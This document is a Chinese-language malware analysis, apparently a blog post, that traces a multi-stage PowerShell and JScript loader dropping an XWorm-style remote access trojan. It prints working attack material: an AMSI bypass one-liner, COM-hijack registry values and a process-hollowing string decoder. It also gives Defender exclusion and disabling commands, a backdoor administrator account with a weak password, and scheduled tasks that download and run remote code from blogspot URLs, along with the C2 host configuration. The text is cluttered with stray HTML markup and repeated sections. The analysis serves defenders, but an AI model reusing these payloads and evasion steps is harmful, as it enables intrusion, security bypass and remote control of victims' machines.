.('{x}{9}'.replace('9','0').replace('x','1')-f'GIMGUL','%%').replace('%%','I').replace('GIMGUL','EX') | ping 127.0.0.1combackmyex[<span>_0x3195[8</span>]](Jigijigi,0,true) //Run 运?行Dpowershell<br>
C:\ProgramData\MinMinons\Candlegraphy.~___~
阶段2
$colabber
$Hetmosphyre
实现的功能
-> [Ref].Assembly.GetType(<span>'System.Management.Automation.AmsiUtils'</span>).GetField(<span>'amsiInitFailed'</span>,<span>'NonPublic,Static'</span>).SetValue($null,$true) AMSI绕过<br> -> 注册表设置COM口劫持amsi绕过 <span>'HKCU:\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32'</span> -N <span>'(Default)'</span> -V <span>"C:\IDontExist.dll"</span><br> ->解密两个.NET的PE,分别赋值变量$Ripple - <span>2.4</span>.dll 和$$Ripple - chas.exe<br> ->$Ripple .NET内存加载 <span>2.4</span>.dll <span>nanamespace:</span>A <span><span>class</span>:<span>B</span> <span>Method</span>:<span>C</span></span><br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"</span>,[OBJECT[]]$Ripple)<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"</span>,[OBJECT[]]$Ripple)<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"</span>,[OBJECT[]]$Ripple)<br> 内存加载实现将chas.exe进程注入到RegSvcs.exe和Msbuild.exe<br>
* 2<span>.4</span><span>.dll</span> <span>-</span> 傀儡进程<br>* <span>chas</span><span>.exe</span> <span>-</span> <span>C2</span><br>
DLL是用de4ot混淆过的
2.4.DLL
去混淆
<span><span>public</span> <span>static</span> <span>string</span> <span>smethod_0</span><span>(<span>string</span> string_11)</span><br> </span>{<br> StringBuilder stringBuilder = <span>new</span> StringBuilder();<br> <span>for</span> (<span>int</span> i = <span>0</span>; i < string_11.Length; i += <span>2</span>)<br> {<br> <span>int</span> value = Convert.ToInt32(string_11.Substring(i, <span>2</span>), <span>16</span>);<br> stringBuilder.Append(Convert.ToChar(value));<br> }<br> <span>return</span> stringBuilder.ToString();<br> }<br> <span><span>public</span> <span>static</span> <span>string</span> <span>ReverseString</span><span>(<span>string</span> s)</span><br> </span>{<br> <span>char</span>[] <span>array</span> = s.ToCharArray();<br> Array.Reverse(<span>array</span>);<br> <span>return</span> <span>new</span> <span>string</span>(<span>array</span>);<br> }<br>
<span>// Token: 0x04000001 RID: 1</span><br> <span>private</span> <span>static</span> <span>string</span> string_0 = B.smethod_0(B.ReverseString(<span>"2333C656E62756B6"</span>)); <span>//Kernel32</span><br><br> <span>// Token: 0x04000002 RID: 2</span><br> <span>private</span> <span>static</span> <span>string</span> string_1 = B.smethod_0(B.ReverseString(<span>"46165627864556D657375625"</span>)); <span>//ResumeThread</span><br><br> <span>// Token: 0x04000003 RID: 3</span><br> <span>private</span> <span>static</span> <span>string</span> string_2 = B.smethod_0(<span>"576F77363<?>53657<?>5<?>687265616<?><?>36F6E7<?>65787<?>"</span>.Replace(<span>"<?>"</span>, <span>"4"</span>)); <span>//Wow64SetThreadContext</span><br><br> <span>// Token: 0x04000004 RID: 4</span><br> <span>private</span> <span>static</span> <span>string</span> string_3 = B.smethod_0(B.ReverseString(<span>"47875647E6F634461656278645475635"</span>)); <span>//SetThreadContext</span><br><br> <span>// Token: 0x04000005 RID: 5</span><br> <span>private</span> <span>static</span> <span>string</span> string_4 = B.smethod_0(<span>"57?F773?3447?57454?872?5?1?443?F?E74?57874"</span>.Replace(<span>"?"</span>, <span>"6"</span>)); <span>//Wow64GetThreadContext</span><br><br> <span>// Token: 0x04000006 RID: 6</span><br> <span>private</span> <span>static</span> <span>string</span> string_5 = B.smethod_0(B.ReverseString(<span>"47875647E6F634461656278645475674"</span>)); <span>//GetThreadContext</span><br><br> <span>// Token: 0x04000007 RID: 7</span><br> <span>private</span> <span>static</span> <span>string</span> string_6 = B.smethod_0(<span>"5??9727475?1?C41?C?C?F?34578"</span>.Replace(<span>"?"</span>, <span>"6"</span>)); <span>//VirtualAllocEx</span><br><br> <span>// Token: 0x04000008 RID: 8</span><br> <span>private</span> <span>static</span> <span>string</span> string_7 = B.smethod_0(B.ReverseString(<span>"9727F6D656D437375636F627055647962775"</span>)); <span>//WriteProcessMemory</span><br><br> <span>// Token: 0x04000009 RID: 9</span><br> <span>private</span> <span>static</span> <span>string</span> string_8 = B.smethod_0(<span>"5265616450?26F6365?3?34D656D6F?2?9"</span>.Replace(<span>"?"</span>, <span>"7"</span>)); <span>//ReadProcessMemory</span><br><br> <span>// Token: 0x0400000A RID: 10</span><br> <span>private</span> <span>static</span> <span>string</span> string_9 = B.smethod_0(B.ReverseString(<span>"E6F6964736563566F4775696650716D6E65577A5"</span>)); <span>//ZwUnmapViewOfSection</span><br><br> <span>// Token: 0x0400000B RID: 11</span><br> <span>private</span> <span>static</span> <span>string</span> string_10 = B.smethod_0(<span>"4372?5?174?55072?F?3?5737341"</span>.Replace(<span>"?"</span>, <span>"6"</span>)); <span>//CreateProcessA</span><br><br> <span>// Token: 0x0400000C RID: 12</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate0 delegate0_0 = B.smethod_1<B.Delegate0>(B.string_0, B.string_1);<br><br> <span>// Token: 0x0400000D RID: 13</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate1 delegate1_0 = B.smethod_1<B.Delegate1>(B.string_0, B.string_2);<br><br> <span>// Token: 0x0400000E RID: 14</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate2 delegate2_0 = B.smethod_1<B.Delegate2>(B.string_0, B.string_3);<br><br> <span>// Token: 0x0400000F RID: 15</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate3 delegate3_0 = B.smethod_1<B.Delegate3>(B.string_0, B.string_4);<br><br> <span>// Token: 0x04000010 RID: 16</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate4 delegate4_0 = B.smethod_1<B.Delegate4>(B.string_0, B.string_5);<br><br> <span>// Token: 0x04000011 RID: 17</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate5 delegate5_0 = B.smethod_1<B.Delegate5>(B.string_0, B.string_6);<br><br> <span>// Token: 0x04000012 RID: 18</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate6 delegate6_0 = B.smethod_1<B.Delegate6>(B.string_0, B.string_7);<br><br> <span>// Token: 0x04000013 RID: 19</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate7 delegate7_0 = B.smethod_1<B.Delegate7>(B.string_0, B.string_8);<br><br> <span>// Token: 0x04000014 RID: 20</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate8 delegate8_0 = B.smethod_1<B.Delegate8>(B.smethod_0(<span>"6E74646C6C"</span>), B.string_9);<br><br> <span>// Token: 0x04000015 RID: 21</span><br> <span>private</span> <span>static</span> <span>readonly</span> B.Delegate9 delegate9_0 = B.smethod_1<B.Delegate9>(B.string_0, B.string_10);<br>
chas.exe
创建互斥体,线程随机延时。接收socket回包执行对应的功能
C2配置
<span>namespace</span> <span>Stub</span><br>{<br> <span>// Token: 0x02000007 RID: 7</span><br> <span>public</span> <span>class</span> <span>Settings</span><br> {<br> <span>// Token: 0x04000006 RID: 6</span><br> <span>public</span> <span>static</span> <span>string</span> Host = <span>"stanthely2023.duckdns.org"</span>;<br><br> <span>// Token: 0x04000007 RID: 7</span><br> <span>public</span> <span>static</span> <span>string</span> Port = <span>"7000"</span>;<br><br> <span>// Token: 0x04000008 RID: 8</span><br> <span>public</span> <span>static</span> <span>string</span> KEY = <span>"<123456789>"</span>;<br><br> <span>// Token: 0x04000009 RID: 9</span><br> <span>public</span> <span>static</span> <span>string</span> SPL = <span>"<Xwormmm>"</span>;<br><br> <span>// Token: 0x0400000A RID: 10</span><br> <span>public</span> <span>static</span> <span>string</span> USBNM = <span>"USB.exe"</span>;<br><br> <span>// Token: 0x0400000B RID: 11</span><br> <span>public</span> <span>static</span> <span>readonly</span> <span>string</span> Mutexx = <span>"tddITwpC5yRaJiTI"</span>;<br><br> <span>// Token: 0x0400000C RID: 12</span><br> <span>public</span> <span>static</span> Mutex _appMutex;<br><br> <span>// Token: 0x0400000D RID: 13</span><br> <span>public</span> <span>static</span> <span>bool</span> usbC;<br><br> <span>// Token: 0x0400000E RID: 14</span><br> <span>public</span> <span>static</span> <span>string</span> current = Process.GetCurrentProcess().MainModule.FileName;<br> }<br>
通讯使用AES加密
C2功能:
|function|note|
|——–|—-|
|Ping|心跳包功能|
|Info|获取被控主机详细信息|
|admin|判断是否为管理员|
|Antivirus|枚举杀毒|
|STDos|DDOS|
|Plugin|动态加载.NET|
|Download|下载者|
|getDrives|枚举盘符/USB|
|getFiles|获取文件信息|
|getFolders|遍历文件夹|
$DEP
-> 注册表设置COM口劫持amsi绕过 <span>'HKCU:\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32'</span> -N <span>'(Default)'</span> -V <span>"C:\IDontExist.dll"</span><br> -> Defender后缀加白<span>:<span>".bat"</span></span>,<span>".ppam"</span>,<span>".xls"</span>,<span>".docx"</span>,<span>".bat"</span>,<span>".exe"</span>,<span>".vbs"</span>,<span>".js"</span>,路径加白<span>:<span>"C:\","</span>D</span><span>:</span>\<span>","</span><span>E:</span>\<span>",进程加白:"</span>explorer.exe<span>","</span>kernel32.dll<span>","</span>kernel32.dll<span>","</span>aspnet_compiler.exe<span>","</span>cvtres.exe<span>","</span>CasPol.exe<span>","</span>csc.exe<span>","</span>csc.exe<span>","</span>Msbuild.exe<span>","</span>ilasm.exe<span>","</span>InstallUtil.exe<span>","</span>jsc.exe<span>","</span>Calc.exe<span>","</span>powershell.exe<span>","</span>rundll32.exe<span>","</span>conhost.exe<span>","</span>Cscript.exe<span>","</span>mshta.exe<span>","</span>cmd.exe<span>","</span>DefenderisasuckingAntivirus<span>","</span>wscript.exe<span>" IP加白:"</span><span>127.0</span>.<span>0</span>.<span>1</span><span>"<br> -> Defender IDS关闭<br> -> Defender关闭<br> -> UAC限制开启 New-Ipublicroperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force<br> -> 停止WinDefend服务,取消WinDefend服务自启<br> -> 创建用户System32 pwd:123添加到管理员,将创建的System32用户添加到"</span>Remote Desktop Users<span>"组<br> -> 停止WinDefend服务,停止WdNisSvc服务,停止WdNisSvc服务,删除windefend服务<br> -> 防火墙关闭<br></span>
阶段3
$X2
-> 三层<span>hex</span>解密js内容写入C:\ProgramData\MinMinons\miguan.js<br> -> 计划任务运行miguan.js schtasks /create /sc MINUTE /mo <span>164</span> /tn miguaned /F /<span>tr</span> <span>"$helogamanunu C:\\ProgramData\\MinMinons\\miguan.js"</span><br> -> <span>5</span>秒后计划执行powershell Schtasks.exe /create /sc minute /mo <span>120</span> /tn escansupdate /f /<span>tr</span> “wscript.exe //b //e:jscript c:\\programdata\\REDACTED\\windowsdefenderupdate.js” powershell.exe “c:\windows\system32\windowspowershell\v1.<span>0</span>\powershell.exe” -ep bypass -c (i’w’r(‘hxxps:<span>//powpowpowff</span>.blogspot[.]com/atom.xml’) -useb) | .(‘<span>{1}</span><span>{0}</span>’-f’ex’,’i’) | ping <span>127.0</span>.<span>0</span>.<span>1</span><br> -> 将<span>"C:\\ProgramData\\MinMinons\" 下所有文件复制到开机自启路径(Startup)<br> ->删除C:\ProgramData\MinMinons\Candlegraphy.~___~<br> ->删除C:\ProgramData\MinMinons\.vbs<br> ->删除C:\ProgramData\MinMinons\.exe<br></span>
eval(function(p,a,c,k,e,d){e=function(c){return(c<span><span><<span>a?'':e(parseInt(c</span>/<span>a</span>)))+((<span>c</span>=<span>c%a)</span>></span></span>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[<span>e(c)</span>]=k[<span>c</span>]||e(c)}k=[<span>function(e){return d[e</span>]}];e=function(){return'\\w+'};c=1};while(c--){if(k[<span>c</span>]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[<span>c</span>])}}return p}('4=q("o:{n-m-l-g-j}");i[<span>"8"</span>](<span>d</span>);2="b>h<span>^ -a p>> -c (5\'w\'r(\'k\') -u></span>B) | .(\'{x}{9}\'.3(\'9\',\'0\').3(\'x\',\'1\')-f\'6\',\'%%\').3(\'%%\',\'5\').3(\'6\',\'t\') | v A.0.0.1";2=2.3("<span>","e");2=2.3("</span>","e");2=2.3("*","e");2=2.3("^","z");2=2.3(">","s");2=2.3(">","s");2=2.3(">","s");2=2.3(">","s");4[<span>"y"</span>](<span>2,0,7</span>);',38,38,'||Jigijigi|replace|combackmyex|I|geleography|true|Sleep||eP|power||5000|||ADB9||WScript|00C04FD58A0B|https://billielishhui.blogspot.com/...Object|||EX||ping|||RUN|ll|127|'.split('|'),0,{}))<br>
- 1
<span>1</span>.ps1<br>-> 运行winword<br>->延迟<span>3</span>秒<br>-> 删除C:\Users\\Downloads\下的所有.docx文件<br>-> 删除C:\Users\\Desktop\下的所有.docx文件<br>-> 创建C:\ProgramData\MinMinons<br>->将$Gamilopera写入C:\ProgramData\MinMinons\Candlegraphy.~<span>_</span>~<br>->IEX运行$Gamilopera变量<br> 第一阶段:<br> ->js内容三层<span>hex</span>解密<br> ->js内容写入到C:\ProgramData\MinMinons\Microsoftupdate.js<br> ->创建计划任务运行js schtasks /create /sc MINUTE /mo <span>180</span> /tn MOperaChrome /F /<span>tr</span> C:\ProgramData\MinMinons\Microsoftupdate.js<br> js阶段:<br> ->ActiveXObject组件通过CLSID:{F935DC22-<span>1</span>CF<span>0</span>-<span>11</span>D<span>0</span>-ADB9-<span>00</span>C04FD58A0B}实例化wscript.Shell<br> ->延迟<span>3</span>秒<br> ->要运行的命令替换运行powershell-> powershell -EP Bypass -c Get-Content -RAW C:\ProgramData\MinMinons\Candlegraphy.~<span></span>~ | .(<span>'{x}{9}'</span>.replace(<span>'9'</span>,<span>'0'</span>).replace(<span>'x'</span>,<span>'1'</span>)-f<span>'GIMGUL'</span>,<span>'%%'</span>).replace(<span>'%%'</span>,<span>'I'</span>).replace(<span>'GIMGUL'</span>,<span>'EX'</span>) | ping <span>127.0</span>.<span>0</span>.<span>1</span><br><br> 第二阶段:<br> -> [Ref].Assembly.GetType(<span>'System.Management.Automation.AmsiUtils'</span>).GetField(<span>'amsiInitFailed'</span>,<span>'NonPublic,Static'</span>).SetValue($null,$true) AMSI绕过<br> -> 注册表设置COM口劫持amsi绕过 <span>'HKCU:\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32'</span> -N <span>'(Default)'</span> -V <span>"C:\IDontExist.dll"</span><br> ->解密两个.NET的PE,分别赋值变量$Ripple - <span>2.4</span>.dll 和$$Ripple - chas.exe<br> ->$Ripple .NET内存加载 <span>2.4</span>.dll nanamespace:A class:B Method:C<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"</span>,[OBJECT[]]$Ripple)<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"</span>,[OBJECT[]]$Ripple)<br> ->A.B.C(<span>"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"</span>,[OBJECT[]]$Ripple)<br> 内存加载实现将chas.exe进程注入到RegSvcs.exe和Msbuild.exe<br> -> 注册表设置COM口劫持amsi绕过 <span>'HKCU:\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32'</span> -N <span>'(Default)'</span> -V <span>"C:\IDontExist.dll"</span><br> -> Defender后缀加白:<span>".bat"</span>,<span>".ppam"</span>,<span>".xls"</span>,<span>".docx"</span>,<span>".bat"</span>,<span>".exe"</span>,<span>".vbs"</span>,<span>".js"</span>,路径加白:<span>"C:\","</span>D:\<span>","</span>E:\<span>",进程加白:"</span>explorer.exe<span>","</span>kernel32.dll<span>","</span>kernel32.dll<span>","</span>aspnet_compiler.exe<span>","</span>cvtres.exe<span>","</span>CasPol.exe<span>","</span>csc.exe<span>","</span>csc.exe<span>","</span>Msbuild.exe<span>","</span>ilasm.exe<span>","</span>InstallUtil.exe<span>","</span>jsc.exe<span>","</span>Calc.exe<span>","</span>powershell.exe<span>","</span>rundll32.exe<span>","</span>conhost.exe<span>","</span>Cscript.exe<span>","</span>mshta.exe<span>","</span>cmd.exe<span>","</span>DefenderisasuckingAntivirus<span>","</span>wscript.exe<span>" IP加白:"</span><span>127.0</span>.<span>0</span>.<span>1</span><span>"<br> -> Defender IDS关闭<br> -> Defender关闭<br> -> UAC限制开启 New-Ipublicroperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force<br> -> 停止WinDefend服务,取消WinDefend服务自启<br> -> 创建用户System32 pwd:123添加到管理员,将创建的System32用户添加到"</span>Remote Desktop Users<span>"组<br> -> 停止WinDefend服务,停止WdNisSvc服务,停止WdNisSvc服务,删除windefend服务<br> -> 防火墙关闭<br><br> 第三阶段:<br> -> 三层hex解密js内容写入C:\ProgramData\MinMinons\miguan.js<br> -> 计划任务运行miguan.js schtasks /create /sc MINUTE /mo 164 /tn miguaned /F /tr "</span>$helogamanunu C:\\ProgramData\\MinMinons\\miguan.js<span>"<br> -> 5秒后计划执行powershell Schtasks.exe /create /sc minute /mo 120 /tn escansupdate /f /tr “wscript.exe //b //e:jscript c:\\programdata\\REDACTED\\windowsdefenderupdate.js” powershell.exe “c:\windows\system32\windowspowershell\v1.0\powershell.exe” -ep bypass -c (i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) | .(‘{1}{0}’-f’ex’,’i’) | ping 127.0.0.1<br> -> 将"</span>C:\\ProgramData\\MinMinons\<span>" 下所有文件复制到开机自启路径(Startup)<br> ->删除C:\ProgramData\MinMinons\Candlegraphy.~__~<br> ->删除C:\ProgramData\MinMinons\.vbs<br> ->删除C:\ProgramData\MinMinons\.exe<br></span>
解密完这些混淆一共得到11个文件:
powershell主要关注的
<span><span>Function</span> <span>Bulega</span> </span>{<br> param($Bulegagone)<br> $Bulegagone = -join ($Bulegagone -split <span>'(..)'</span> | ? { $_ } | % { [char][convert]::ToUInt32($_,<span>16</span>) })<br> <span>return</span> $Bulegagone<br>}<br><br>遍历混淆的十六进制编码进行解码<br><br><br>.(<span>'{x}{9}'</span>.replace(<span>'9'</span>,<span>'0'</span>).replace(<span>'x'</span>,<span>'1'</span>)-f<span>'gomaliker'</span>,<span>'%%'</span>).replace(<span>'%%'</span>,<span>'I'</span>).replace(<span>'gomaliker'</span>,<span>'EX'</span>)<br>IEX<br>
